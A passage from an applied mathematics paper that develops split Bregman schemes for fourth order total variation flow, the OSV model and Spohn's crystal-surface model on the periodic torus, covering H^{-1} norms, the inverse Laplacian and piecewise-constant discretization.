Performing numerical computations for the ROF model, the OSV model and total variation flow have difficulties because of its singularity. Several studies have suggested numerical schemes for the ROF model and second order total variation flow. Especially, the split Bregman framework is well-known as an efficient solver for the ROF model.
The aim of this paper is to provide a new numerical scheme, which is based on the backward Euler method and split Bregman framework, for fourth order total variation flow and Spohn's fourth order model. Numerical experiments are demonstrated for fourth order problems under periodic boundary condition.
The split Bregman method, which is based on the Bregman iterative scheme \cite{Br'e67}, has been studied and performed in image processing (for example, see \cite{OBG05}).
Goldstein and Osher \cite{GO09} have proposed the alternating split Bregman method. Their method separates the ``$L^1$'' minimization part and ``$L^2$'' part.
The alternating split Bregman method has several advantages. They have mentioned that the ``$L^2$'' part is differentiable, and the shrinking method can be applied to the ``$L^1$'' part for the ROF model. Therefore it is extremely efficient solver and easy to code. The split Bregman framework can be performed for second order total variation flow easily. For example,
\begin{equation}
\label{Eq:Second_TV_Flow}
u_t = \operatorname{div}\left(\dfrac{\nabla u}{|\nabla u|}\right)
\end{equation}
introduces the subdifferential formulation $u_t\in -\partial F(u)$, where $F(u) = \int_{\Omega}|Du|$.
We let $u_t\approx (u^{k+1}-u^k)/\tau$ and apply the backward Euler method to the subdifferential formulation, then we obtain
\begin{equation}
u^{k+1} = \mathop{\mathrm{argmin}}_{u\in L^2(\Omega)}\left\{\displaystyle\int_{\Omega}|Du|+\dfrac{1}{2\tau}\|u-u^k\|_{L^2(\Omega)}^2\right\},
\end{equation}
where $\tau$ is time step size. This is essentially the same problem as the ROF model, therefore the split Bregman framework can be applied to second order total variation flow.
In this paper, we propose the split Bregman framework for the OSV model \eqref{OSVmodel}, fourth order total variation flow
\begin{equation}
\label{Eq:FourthOrderTVFlow}
u_t = -\Delta\left(\operatorname{div}\left(\dfrac{\nabla u}{|\nabla u|}\right)\right)
\end{equation}
and Spohn's fourth order model \eqref{Eq:SpohnFourthOrder}. For simplicity, we consider one-dimensional torus $\mathbb{T}$. We introduce spatial discretization by piecewise constant functions, then we compute $\nabla(-\Delta_{\mathrm{av}})^{-1}v_h$ for piecewise constant function $v_h$ approximately or exactly.
We apply the discrete gradient and discrete inverse Laplacian in our first scheme.
In our second scheme, we calculate the inverse Laplacian for piecewise constant functions directly by using the second degree B-spline, which is continuously differentiable piecewise polynomials.
The problem can be reduced into a minimization problem on the Euclidean space, which is included in earlier studies for the ROF model.
Therefore we can apply the split Bregman framework to fourth order problems.
Several theoretical results such as the convergence \cite{COS10} can be applied to our scheme directly.
Both of our two schemes are demonstrated for fourth order problems, and we can check that they perform quite well.
Furthermore, we introduce a new shrinkage operator for Spohn's fourth order model. This enables to perform the numerical experiment for the relaxation of a crystalline surface below the roughening temperature quite effectively. Our scheme can be extended to fourth order problems on the two-dimensional torus. We also suggest a shrinkage operator for two-dimensional Spohn's model.
Let us quickly overview some earlier results.
There are many mathematical studies for the second and fourth order total variation flow. The well-posedness for fourth order total variation flow can be proved by considering the right hand side in \eqref{Eq:FourthOrderTVFlow} as a subdifferential of a total variation in $H^{-1}(\Omega)$ (see \cite{Kas04}). This enables us to use the theory of maximal monotone operators \cite{Kom67,Bre73}.
On the other hand, Elliott and Smitheman \cite{ES07} have proved the well-posedness for fourth order total variation flow by using the Galerkin method.
Adjusting the methods in \cite{GK11}, Giga, Kuroda and Matsuoka \cite{GKM14} have established the extinction time estimate under Dirichlet boundary condition.
Numerical computations which include anisotropic diffusion are performed in \cite{MMR15} for second order models.
Note that even for the second order total variation flow \eqref{Eq:Second_TV_Flow}, because of singularity at $\nabla u=0$, the speed of evolution is determined by nonlocal quantities. Therefore the definition of the solution itself is nontrivial.
For the second order model, the comparison principle holds, and the theory of viscosity solutions is applicable to show well-posedness for a wide class of total variation type equations \cite{GGP13,GGP14}. However, for the fourth order problem, the comparison principle does not hold in general (see \cite[Theorem 3.7]{GG10}), and the theory of viscosity solutions is not applicable.
For more details of mathematical analysis, we refer the reader to \cite{GG10} and references therein.
Several studies have considered the fourth order problem under periodic boundary condition.
Kashima \cite{Kas12} has studied the characterization of subdifferential in $H_{\mathrm{av}}^{-1}(\mathbb{T}^d)$.
The exact profile of the fourth order total variation flow has been studied in \cite{GG10}. The extinction time estimate under periodic boundary condition has been established in \cite{GK11}.
A duality based numerical scheme which applies the forward-backward splitting has been proposed in \cite{GMR19}.
Kohn and Versieux \cite{KV10} have performed the numerical computation for Spohn's model. Their numerical scheme is based on the backward Euler method, mixed finite element method and regularization for singularity. They have proved the convergence by combining the regularization error estimate with temporal and spatial semidiscretization error estimates.
The application of the split Bregman framework to crystalline flow has also been studied through what is called a level-set method.
A crystalline mean curvature flow has been proposed independently in \cite{AG89} and \cite{Tay91}.
Oberman, Osher, Takei and Tsai \cite{OOTT11} have proposed applying the split Bregman framework to the level-set equation of mean curvature flow. Po\v{z}\'{a}r \cite{Poza18} has studied self-similar solutions of three dimensional crystalline mean curvature flow and presented a numerical scheme which is based on the finite element method and split Bregman framework. However, all calculations given there are for the second order model.
A level-set method for mean curvature flow interprets the motion of curvature flow by a level-set of a solution of
\begin{equation}
\label{Eq:LevelSetMeanCurvature}
\dfrac{\partial u}{\partial t}-|\nabla u|\operatorname{div}\left(\dfrac{\nabla u}{|\nabla u|}\right)=0.
\end{equation}
It is a powerful tool to calculate evolution which experiences topological change. It was introduced by Osher and Sathian \cite{OS88} as a numerical way to calculate the mean curvature flow. Note that the level-set mean curvature equation \eqref{Eq:LevelSetMeanCurvature} looks similar to \eqref{Eq:Second_TV_Flow}. However, the singularity of \eqref{Eq:LevelSetMeanCurvature} at $\nabla u=0$ is weaker than one of \eqref{Eq:Second_TV_Flow} because of the multiplier $|\nabla u|$. Therefore it is not necessary to study nonlocal quantities for the level-set mean curvature equation. Its analytic foundation such as well-posedness and comparison principle has been established in \cite{CGG91,ES91}. For more details, we refer the readers to \cite{Gig06}. Very recently, the analytic foundation of the level-set method is extended to crystalline flow by Po\v{z}\'{a}r and the first author \cite{GP16,GP18} and Chambolle, Morini and Ponsiglione \cite{CMP17} and with Novaga \cite{CMNP17} independently. Their methods are quite different.
This paper is organized as follows. Section \ref{Sec:Preliminary} states the definition of $H^{-1}_{\mathrm{av}}(\mathbb{T})$ and the total variation. We introduce the discretization by piecewise constant functions in Section \ref{Sec:Discrete}. Furthermore, we propose two schemes for reducing $\|\cdot\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}$ into Euclidean norm. Section \ref{Sec:SplitBregman} presents the split Bregman framework for the OSV model and fourth order total variation flow problem. In Section \ref{Sec:Spohn}, we describe the shrinking method for Spohn's model. This report presents numerical examples on one-dimensional torus in Section \ref{Sec:NumExample}. Finally, we extend our scheme to two-dimensional fourth order problems under periodic boundary condition in Section \ref{Sec:TwoDim}.
\section{Preliminary}
\label{Sec:Preliminary}
\subsection{Fourier analysis on the torus $\mathbb{T}$}
First, we review some of the standard facts on the Fourier analysis for one-dimensional torus $\mathbb{T} = \mathbb{R}/\mathbb{Z}$. In this paper, we regard $\mathbb{T}$ as an interval $[0,1]$ with periodic boundary condition. The Fourier transform for $f\in L^1(\mathbb{T})$ and definition of Sobolev space on $\mathbb{R}$ are explained in \cite[Chapter 3]{Gra14a} and \cite[Chapter 1.3]{Gra14b}, respectively.
Let $\mathcal{D}(\mathbb{T})$ be the complex-valued function space $C^{\infty}(\mathbb{T})$ endowed with the usual test function topology and $\mathcal{D}'(\mathbb{T})$ be its dual. The Fourier coefficient $\widehat{f}_T(\xi)\in \mathbb{C}$ for $f\in \mathcal{D}'(\mathbb{T})$ is defined by the generalized Fourier transform (for example, see \cite[Chapter 5]{Gru09});
\begin{equation}
\widehat{f}_T(\xi) = \langle f,e^{-2\pi i\xi x}\rangle_{\mathcal{D}'(\mathbb{T}),\mathcal{D}(\mathbb{T})}.
\end{equation}
The generalized Fourier transform satisfies similar properties to Fourier transform for $f\in L^1(\mathbb{T})$, for example,
\begin{equation}
\label{Eq:FourierDeriv}
\widehat{df/dx}_T(\xi) = \left\langle f,\dfrac{d}{dx}e^{-2\pi i\xi x}\right\rangle_{\mathcal{D}'(\mathbb{T}),\mathcal{D}(\mathbb{T})} = -2\pi i\xi\widehat{f}_T(\xi)
\end{equation}
for all $f\in\mathcal{D}'(\mathbb{T})$.
Furthermore, the Fourier coefficients $\widehat{f}_T(\xi)\in\mathbb{C}$ satisfies
\begin{equation}
f(x) = \displaystyle\sum_{\xi\in\mathbb{Z}}\widehat{f}_T(\xi)e^{2\pi i\xi x}
\end{equation}
for all $f\in \mathcal{D}'(\mathbb{T})$ (see \cite[Chapter 8.2]{Gru09}).
In this Fourier series, the convergence should be understood in the natural topology of $\mathcal{D}'(\mathbb{T})$.
It is well-known that $\mathcal{D}(\mathbb{T})$ is dense in $L^2(\mathbb{T})$, therefore we have $L^2(\mathbb{T})\simeq (L^2(\mathbb{T}))^*\subset \mathcal{D}'(\mathbb{T})$, where $(L^2(\mathbb{T}))^*$ is the dual space of $L^2(\mathbb{T})$ (for example, see \cite[Chapter 5.2]{Bre11}).
Using the generalized Fourier transform, the Lebesgue space and the Sobolev space on $\mathbb{T}$ are defined as follows:
\begin{equation}
\label{Def:L2T}
L^2(\mathbb{T}) = \left\{f\in \mathcal{D}'(\mathbb{T}) : \displaystyle\sum_{\xi\in\mathbb{Z}}|\widehat{f}_T(\xi)|^2<\infty\right\},
\end{equation}
\begin{equation}
\label{Def:H1T}
H^1(\mathbb{T}) = \left\{f\in L^2(\mathbb{T}) : \displaystyle\sum_{\xi\in\mathbb{Z}}\xi^2|\widehat{f}_T(\xi)|^2<\infty\right\}=\left\{f\in \mathcal{D}'(\mathbb{T}) : \displaystyle\sum_{\xi\in\mathbb{Z}}(1+\xi^2)|\widehat{f}_T(\xi)|^2<\infty\right\},
\end{equation}
\begin{equation}
\label{Def:H-1T}
H^{-1}(\mathbb{T}) = \left\{f\in\mathcal{D}'(\mathbb{T}) : \displaystyle\sum_{\xi\in\mathbb{Z}}(1+\xi^2)^{-1}|\widehat{f}_T(\xi)|^2<\infty\right\}.
\end{equation}
Note that the duality pairing can be described formally as
\begin{equation}
\langle f,g\rangle_{H^{-1}(\mathbb{T}),H^1(\mathbb{T})} = \displaystyle\sum_{\xi\in\mathbb{Z}}\widehat{f}_T(\xi)\overline{\widehat{g}_T(\xi)} = \displaystyle\int_{\mathbb{T}}f(x)\overline{g(x)}~dx
\end{equation}
for all $f\in H^{-1}(\mathbb{T})$ and $g\in H^1(\mathbb{T})$.
\subsection{The inverse Laplacian $(-\Delta_{\mathrm{av}})^{-1}$}
We consider the functions on $\mathbb{T}$ whose average are equal to zero. Let
\begin{subequations}
\begin{align}
L^2_{\mathrm{av}}(\mathbb{T}) &= \left\{f\in L^2(\mathbb{T}) : \displaystyle\int_{\mathbb{T}}f(x)~dx=0\right\},\\
H^1_{\mathrm{av}}(\mathbb{T}) &= L^2_{\mathrm{av}}(\mathbb{T})\cap H^1(\mathbb{T}) = \left\{f\in H^1(\mathbb{T}) : \displaystyle\int_{\mathbb{T}}f(x)~dx = 0\right\},\\
H^{-1}_{\mathrm{av}}(\mathbb{T}) &= \left\{f\in H^{-1}(\mathbb{T}) : \langle f,1\rangle_{H^{-1}(\mathbb{T}),H^1(\mathbb{T})} =0\right\}.
\end{align}
\end{subequations}
These definitions agree with the following ones:
\begin{equation}
L^2_{\mathrm{av}}(\mathbb{T}) = \left\{f\in \mathcal{D}'(\mathbb{T}) : \displaystyle\sum_{\xi\neq0}|\widehat{f}_T(\xi)|^2<\infty\mbox{ and }\widehat{f}_T(0)=0\right\},
\end{equation}
\begin{equation}
H^1_{\mathrm{av}}(\mathbb{T}) = \left\{f\in\mathcal{D}'(\mathbb{T}) : \displaystyle\sum_{\xi\neq0}\xi^2|\widehat{f}_T(\xi)|^2<\infty\mbox{ and }\widehat{f}_T(0) = 0\right\},
\end{equation}
\begin{equation}
H^{-1}_{\mathrm{av}}(\mathbb{T}) = \left\{f\in\mathcal{D}'(\mathbb{T}) : \displaystyle\sum_{\xi\neq0}\xi^{-2}|\widehat{f}_T(\xi)|^2<\infty\mbox{ and }\widehat{f}_T(0) = 0\right\}.
\end{equation}
It is easy to check that each of these spaces are Hilbert space endowed with the inner products
\begin{subequations}
\begin{align}
(f,g)_{L^2_{\mathrm{av}}(\mathbb{T})}&=\displaystyle\sum_{\xi\neq0}\widehat{f}_T(\xi)\overline{\widehat{g}_T(\xi)},\\
(f,g)_{H^1_{\mathrm{av}}(\mathbb{T})}&=\displaystyle\sum_{\xi\neq0}4\pi^2\xi^2\widehat{f}_T(\xi)\overline{\widehat{g}_T(\xi)},\\
(f,g)_{H^{-1}_{\mathrm{av}}(\mathbb{T})}&=\displaystyle\sum_{\xi\neq0}\dfrac{1}{4\pi^2}\xi^{-2}\widehat{f}_T(\xi)\overline{\widehat{g}_T(\xi)},
\end{align}
\end{subequations}
respectively. These inner products introduce the norms $\|\cdot\|_{L^2_{\mathrm{av}}(\mathbb{T})}$, $\|\cdot\|_{H^1_{\mathrm{av}}(\mathbb{T})}$ and $\|\cdot\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}$. It is easy to check that
\begin{alignat}{2}
\|f\|_{L^2_{\mathrm{av}}(\mathbb{T})}&=\|f\|_{L^2(\mathbb{T})} &\qquad\mbox{for all }f\in L^2_{\mathrm{av}}(\mathbb{T}),\\
\|f\|_{H^1_{\mathrm{av}}(\mathbb{T})} &= \|df/dx\|_{L^2(\mathbb{T})} &\qquad\mbox{for all }f\in H^1_{\mathrm{av}}(\mathbb{T}).
\end{alignat}
Fix $u\in H^1_{\mathrm{av}}(\mathbb{T})$ arbitrarily. Let $c(\xi) = 4\pi^2\xi^2\widehat{u}_T(\xi)\in\mathbb{C}$ and $f(x) = \sum_{\xi\in\mathbb{Z}}c(\xi)e^{2\pi i\xi x}$, then we have $c(0)=0$ and $\sum_{\xi\neq0}\xi^{-2}|c(\xi)|^2 = 16\pi^4\sum_{\xi\neq0}\xi^2|\widehat{u}_T(\xi)|^2<\infty$. This implies $f\in H^{-1}_{\mathrm{av}}(\mathbb{T})$. Moreover,
\begin{equation}
-\Delta u(x) = \displaystyle\sum_{\xi\in\mathbb{Z}}\widehat{(-\Delta u)}_T(\xi)e^{2\pi i\xi x}
=\displaystyle\sum_{\xi\in\mathbb{Z}}4\pi^2\xi^2\widehat{u}_T(\xi)e^{2\pi i\xi x} = f(x),
\end{equation}
where $-\Delta u = -d^2u/dx^2$. Consequently, $u=(-\Delta_{\mathrm{av}})^{-1}f$ defines $(-\Delta_{\mathrm{av}})^{-1}:H^1_{\mathrm{av}}(\mathbb{T})\to H^{-1}_{\mathrm{av}}(\mathbb{T})$. We call this operator the \textit{inverse Laplacian}.
Let $f\in H^{-1}_{\mathrm{av}}(\mathbb{T})$ and $u=(-\Delta)_{\mathrm{av}}^{-1}f\in H^1_{\mathrm{av}}(\mathbb{T})$, then we have
\begin{align*}
\|f\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2 &= \|-\Delta u\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2\\
&= \displaystyle\sum_{\xi\neq0}\dfrac{1}{4\pi^2}\xi^{-2}\widehat{(-\Delta u)}_T(\xi)\overline{\widehat{(-\Delta u)}_T(\xi)}\\
&= \displaystyle\sum_{\xi\neq0}4\pi^2\xi^2|\widehat{u}_T(\xi)|^2 = \|u\|_{H^1_{\mathrm{av}}(\mathbb{T})}^2.
\end{align*}
This implies
\begin{equation}
\label{Lem:H-1av_norm}
\|f\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})} =\|(-\Delta_{\mathrm{av}})^{-1}f\|_{H^1_{\mathrm{av}}(\mathbb{T})}= \|\nabla (-\Delta_{\mathrm{av}})^{-1}f\|_{L^2(\mathbb{T})}
\end{equation}
for all $f\in H^{-1}_{\mathrm{av}}(\mathbb{T})$, where $\nabla = d/dx$.
\subsection{Bounded variation and $H^{-1}$ fidelity for the torus $\mathbb{T}$}
We recall the spaces of functions of \textit{bounded variation} in one-dimensional torus.
\begin{definition}[Definition 3.3.13 of \cite{Gra14a}]
For a measurable function $f$ on $\mathbb{T}$ which is defined everywhere, we define the \textit{total variation} as
\begin{equation}
\displaystyle\int_{\mathbb{T}}|Df| = \operatorname{ess} \sup\left\{\displaystyle\sum_{j=1}^M|f(x_j)-f(x_{j-1})| : 0=x_0<x_1<\dots<x_M=1\right\},
\end{equation}
where the supremum is taken over all partition of the interval $[0,1]$.
we say $f$ is \textit{bounded variation} if the total variation of $f$ is bounded.
Moreover, we define
\begin{equation}
BV(\mathbb{T}) = \left\{v\in \mathcal{D}'(\mathbb{T}) : \displaystyle\int_{\mathbb{T}}|Df|<\infty\right\}.
\end{equation}
\end{definition}
\begin{remark}
In the definition, $D$ can be regarded as the distributional derivative, and $Df$ can be identified with a signed Borel measure.
\end{remark}
\begin{remark}
The total variation on a general open set $\Omega\subset \mathbb{R}^d$ is defined as
\begin{equation}
\displaystyle\int_{\Omega}|Dv| = \sup\left\{-\int_{\Omega}u(x)\operatorname{div}\phi(x)~dx : \phi\in C^{\infty}_0(\Omega;\mathbb{R}^d)\mbox{ and }\|\phi\|_{L^{\infty}(\Omega)}\le1\right\},
\end{equation}
and the space of bounded variation is defined as
\begin{equation}
BV(\Omega) = \left\{v\in L^1(\Omega) : \displaystyle\int_{\Omega}|Dv|<\infty\right\}.
\end{equation}
It is well-known that if $v\in W^{1,1}(\Omega)$, then
\begin{equation}
\displaystyle\int_{\Omega}|Dv| = \int_{\Omega}|\nabla v|~dx = |v|_{W^{1,1}(\Omega)},
\end{equation}
and therefore $W^{1,1}(\Omega)\subset BV(\Omega)\subset L^1(\Omega)$.
\end{remark}
We define the functional $\Phi:H^{-1}_{\mathrm{av}}(\mathbb{T})\to \mathbb{R}\cup\{\infty\}$ as
\begin{equation}
\Phi(v) =\left\{\begin{array}{ll}
\displaystyle\int_{\mathbb{T}}|Dv|&\mbox{if }v\in BV(\mathbb{T})\cap H^{-1}_{\mathrm{av}}(\mathbb{T}),\\
\infty&\mbox{otherwise.}\end{array}\right.
\end{equation}
Note that $\Phi:H^{-1}_{\mathrm{av}}(\mathbb{T})\to \mathbb{R}\cup\{\infty\}$ is nonnegative, proper, lower semi-continuous and convex. In this paper, we consider the gradient flow equation of the form
\begin{equation}
\label{Eq:GradientFlow}
(\mbox{gradient flow})\left\{\begin{array}{rll}
\dfrac{du}{dt}(t) &\in-\partial_{H^{-1}_{\mathrm{av}}(\mathbb{T})}\Phi(u(t))&\mbox{for a.e. }t>0,\\
u(\cdot,0) &=u_0\in H^{-1}_{\mathrm{av}}(\mathbb{T}),&
\end{array}\right.
\end{equation}
where the subdifferential $\partial_{H^{-1}_{\mathrm{av}}(\mathbb{T})}$ is defined as
\begin{equation}
\partial_{H^{-1}_{\mathrm{av}}(\mathbb{T})}F(u) = \left\{p\in H^{-1}_{\mathrm{av}}(\mathbb{T}) : F(v)-F(u)\ge (p,v-u)_{H^{-1}_{\mathrm{av}}(\mathbb{T})} \mbox{ for all }v\in H^{-1}_{\mathrm{av}}(\mathbb{T})\right\}
\end{equation}
for any convex functional $F:H^{-1}_{\mathrm{av}}(\mathbb{T})\to \mathbb{R}\cup\{\infty\}$ and $u\in H^{-1}_{\mathrm{av}}(\mathbb{T})$. It is well-known that the theory of maximal monotone operators shows the existence and uniqueness of solution $u\in C([0,\infty),H^{-1}_{\mathrm{av}}(\mathbb{T}))$ to equation \eqref{Eq:GradientFlow} (for example, see \cite{Kom67}).
Let $\tau>0$ be the temporal step size. We consider the backward Euler method for gradient flow equation \eqref{Eq:GradientFlow}; for given $u^k\in H^{-1}_{\mathrm{av}}(\mathbb{T})$, find $u^{k+1}\in H^{-1}_{\mathrm{av}}(\mathbb{T})$ such that
\begin{equation}
\dfrac{u^{k+1}-u^k}{\tau}
\in -\partial_{H^{-1}_{\mathrm{av}}(\mathbb{T})}\Phi(u^{k+1}).
\end{equation}
This can be reduced to solving the following minimization problem:
\begin{equation}
\label{Eq:BackEuler}
u^{k+1} = \displaystyle\mathop{\mathrm{argmin}}_{u\in H^{-1}_{\mathrm{av}}(\mathbb{T})}\left\{ \Phi(u)+\dfrac{1}{2\tau}\|u-u^k\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2\right\}.
\end{equation}
Since $\Phi$ is convex, such $u^{k+1}$ is uniquely determined.
The convergence of backward Euler method has been proved in \cite{Kom67}.
Note that equation \eqref{Eq:BackEuler} is similar to the OSV model \cite{OSV03} which can be described as
\begin{equation}
\label{Problem:OSV}
(\mbox{OSV})\left\{\begin{array}{l}
\mbox{Find $u\in H^{-1}_{\mathrm{av}}(\mathbb{T})$ such that}\\
u = \mathop{\mathrm{argmin}}\left\{\Phi(u) + \dfrac{\lambda}{2}\|u-f\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2\right\},
\end{array}\right.
\end{equation}
where $f\in H^{-1}_{\mathrm{av}}(\mathbb{T})$ is given data and $\lambda>0$ is an artificial parameter.
The existence result in convex analysis (for example, see \cite[Cor3.23]{Bre11}) gives that the minimizer $u\in BV(\mathbb{T})\cap H^{-1}_{\mathrm{av}}(\mathbb{T})$ exists.
Hereafter, we consider the following minimization problem: find $u\in H^{-1}_{\mathrm{av}}(\mathbb{T})$ such that
\begin{equation}
(\mathrm{P}0)\quad \displaystyle\mathop{\mathrm{minimize}}_{u\in H^{-1}_{\mathrm{av}}(\mathbb{T})}\left\{\Phi(u)+\dfrac{\lambda}{2}\|u-f\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2\right\},
\end{equation}
where $f\in H^{-1}_{\mathrm{av}}(\mathbb{T})$ is a given data or $f=u^k$, and $\lambda$ is a given parameter or $\lambda = 1/\tau$.
This involves both of (OSV) and the backward Euler method for (gradient flow).
Furthermore, $(\mbox{P}0)$ introduces the following constrained problem:
\begin{equation}
\label{Eq:Constrained}
(\mathrm{P}1)\quad \displaystyle\mathop{\mathrm{minimize}}_{u\in H^{-1}_{\mathrm{av}}(\mathbb{T})}\left\{\displaystyle\int_{\mathbb{T}}|d|+\dfrac{\lambda}{2}\|u-f\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2 : d=Du\right\}.
\end{equation}
\begin{remark}
When we consider the Spohn's model
\begin{equation}
u_t = -\Delta\left(\operatorname{div}\left(\beta\dfrac{\nabla u}{|\nabla u|}+|\nabla u|^{p-2}\nabla u\right)\right),
\end{equation}
the subdifferential formulation is given as $u_t \in -\partial_{H^{-1}_{\mathrm{av}}(\mathbb{T})}\widetilde{\Phi}(u)$, where
\begin{equation}
\widetilde{\Phi}(u) = \beta\displaystyle\int_{\mathbb{T}}|Du| + \dfrac{1}{p}\int_{\mathbb{T}}|Du|^p.
\end{equation}
Therefore the backward Euler method yields
\begin{equation}
u^{k+1} = \mathop{\mathrm{argmin}}_{u\in H^{-1}_{\mathrm{av}}(\mathbb{T})}\left\{\widetilde{\Phi}(u)+\dfrac{1}{2\tau}\|u-u^k\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2\right\}.
\end{equation}
Then we consider the constraint problem
\begin{equation}
\mathop{\mathrm{minimize}}_{u\in H^{-1}_{\mathrm{av}}(\mathbb{T})}\left\{\beta\displaystyle\int_{\mathbb{T}}|d|+\dfrac{1}{p}\int_{\mathbb{T}}|d|^p + \dfrac{\lambda}{2}\|u-f\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2 : d=Du\right\}.
\end{equation}
\end{remark}
\section{Discretization for total variation flow and OSV model}
\label{Sec:Discrete}
\subsection{Discretization for minimization problem}
We introduce the (spatial) discretization for the problem $(\mbox{P}1)$. Let $N\in\mathbb{N}$ be the partition number, $h=1/N$ and $x_n = nh$. We regard $x_0 = x_N$, then $\{x_n\}_{n=0}^N$ gives an uniform partition for $\mathbb{T}$. Furthermore, we let $x_{n+1/2} = (x_n+x_{n+1})/2 = (n+1/2)h$ for $n = -1,0,\dots, N$, where $x_{-1/2}$ and $x_{N+1/2}$ are identified with $x_{N-1/2}$ and $x_{1/2}$, respectively. Then we define the following spaces of piecewise constant functions:
\begin{subequations}
\begin{align}
V_{h} &= \left\{v_h:\mathbb{T}\to\mathbb{R} : v_h|_{I_n}\in \mathbb{P}_0(I_n)\mbox{ for all }n=0,\dots,N\right\},\\
V_{h0} &= \left\{v_h = \displaystyle\sum_{n=1}^Nv_n\boldsymbol{1}_{I_n}\in V_h : \displaystyle\sum_{n=1}^Nv_n = 0\right\},\\
\widehat{V}_{h} &= \{d_h:I\to\mathbb{R} : d_h|_{[x_{n-1},x_n)}\in\mathbb{P}_0([x_{n-1},x_n))\mbox{ for all }n=1,\dots,N\},
\end{align}
\end{subequations}
where $I=[0,1]$, $I_n = [x_{n-1/2},x_{n+1/2})$, $\mathbb{P}_0(I_n)$ is a space of constant functions on interval $I_n$ and $\boldsymbol{1}_{I_{n}}$ is its characteristic function.
Note that $V_{h0}$ is a finite dimensional subspace of $H^{-1}_{\mathrm{av}}(\mathbb{T})$.
Furthermore, we define $D_h:V_{h0}\to\widehat{V}_h\cap L^2_{\mathrm{av}}(I)$ as
\begin{equation}
D_hv_h = \displaystyle\sum_{n=1}^N(v_{n}-v_{n-1})\boldsymbol{1}_{[x_{n-1},x_n)},
\end{equation}
where $v_0$ is identified with $v_N$.
Let $d_h=D_hv_h\in\widehat{V}_h$, $\textbf{d} = (d_1,\dots, d_N)^{\mathrm{T}}\in\mathbb{R}^N$ for $d_h=\sum_{n=1}^Nd_n\boldsymbol{1}_{[x_{n-1},x_n)}$, $\widetilde{\textbf{v}} = (v_1,v_2,\dots, v_{N})^{\mathrm{T}}\in\mathbb{R}^N$ for $v_h=\sum_{n=1}^Nv_n\boldsymbol{1}_{I_n}\in V_{h0}$, then we have
\begin{equation}
\Phi(v_h) = \dfrac{\|D_hv_h\|_{L^1(I)}}{h} = \dfrac{\|d_h\|_{L^1(I)}}{h} = h\|\nabla_h\widetilde{\textbf{v}}\|_1 = \|\textbf{d}\|_1,
\end{equation}
where $\nabla_h:\mathbb{R}^N\to\mathbb{R}^N$ is the discrete gradient
\begin{equation}
\nabla_h = h^{-1}\begin{pmatrix}
1&0&\dots&0&-1\\
-1&1&\dots&0&0\\
\vdots&&\ddots&&\vdots\\
0&0&\dots&-1&1
.\end{pmatrix}\in\mathbb{R}^{N\times N}.
\end{equation}
Note that $D_hv_h\in \widehat{V}_h\cap L^2_{\mathrm{av}}(I)\subset L^2_{\mathrm{av}}(I)$ for all $v_h\in V_{h0}$; however, $D_hv_h\not\in H^{-1}_{\mathrm{av}}(\mathbb{T})$ because it does not satisfy the periodic boundary condition (see Figure \ref{Fig:vh_and_Dhvh}).
\begin{figure}[tb]
\centering
\includegraphics[clip,scale=.7]{plot_V0h.pdf}
\includegraphics[clip,scale=.7]{plot_widehatVh.pdf}
\caption{An example of $v_h\in V_{h0}$ and $D_hv_h\in \widehat{V}_h$.}
\label{Fig:vh_and_Dhvh}
\end{figure}
Here we introduce the discretized problem for (P$1$);
\begin{equation}
(\mathrm{P}1)_h\quad \displaystyle\mathop{\mathrm{minimize}}_{u_h\in V_{h0}}\left\{\|\textbf{d}\|_1 + \dfrac{\lambda}{2}\|u_h-f_h\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2 : d_h = D_h u_h\in \widehat{V}_h\right\},
\end{equation}
where $f_h\in V_{h0}$ is given data or $f_h=u_h^k$, and $\textbf{d} = (d_1,\dots, d_N)^{\mathrm{T}}$ for $d_h=\sum_{n=1}^Nd_n\boldsymbol{1}_{[x_{n-1},x_n)}$.
Furthermore, we introduce the unconstrained problem
\begin{equation}
(\mathrm{P}2)_h\quad \displaystyle\mathop{\mathrm{minimize}}_{u_h\in V_{h0}, d_h\in\widehat{V}_h}\left\{\|\textbf{d}\|_1 + \dfrac{\lambda}{2}\|u_h-f_h\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2 + \dfrac{\mu}{2}\|d_h - D_h u_h\|_{L^2(I)}^2\right\}.
\end{equation}
\begin{remark}
In this paper, we use $\|d_h-D_hu_h\|_{L^2(I)}^2$. This enables to apply the shrinking method to minimization problem in the split Bregman framework.
\end{remark}
\subsection{Corresponding matrix form}
We reduce $(\mathrm{P}2)_h$ to the matrix formulation. Let $\textbf{d} = (d_1,\dots, d_N)^{\mathrm{T}}\in\mathbb{R}^N$ for $d_h=\sum_{n=1}^Nd_n\boldsymbol{1}_{[x_{n-1},x_n)}$, $\widetilde{\textbf{u}} = (u_1,\dots, u_N)^{\mathrm{T}}\in\mathbb{R}^N$ and $\textbf{u}=(u_1,\dots,u_{N-1})^{\mathrm{T}}\in\mathbb{R}^{N-1}$ for $u_h = \sum_{n=1}^Nu_n\boldsymbol{1}_{I_n}\in V_{h0}$, then we have
\begin{equation}
d_h-D_hu_h = \displaystyle\sum_{n=1}^N(d_n-(u_n-u_{n-1}))\boldsymbol{1}_{[x_{n-1},x_n)} = (\textbf{d}-S\widetilde{\textbf{u}})\cdot(\boldsymbol{1}_{[x_0,x_1)},\dots, \boldsymbol{1}_{[x_{N-1},x_N)})^{\mathrm{T}},
\end{equation}
where $S_N=h\nabla_h\in\mathbb{R}^{N\times N}$.
Furthermore, $u_h\in V_{h0}$ implies $u_N = -\sum_{n=1}^{N-1}u_n$, that is, $\widetilde{\textbf{u}} = R_N\textbf{u}$, where
\begin{equation}
\label{Def:R}
R_N = \begin{pmatrix}
1&0&\dots&0&\\
0&1&\dots&0&\\
\vdots&&\ddots&\vdots\\
0&0&\dots&1\\
-1&-1&\dots&-1
\end{pmatrix}\in\mathbb{R}^{N\times(N-1)}.
\end{equation}
Therefore
\begin{equation}
\label{Eq:L2_part}
\dfrac{\mu}{2}\|d_h-D_hu_h\|_{L^2(I)}^2
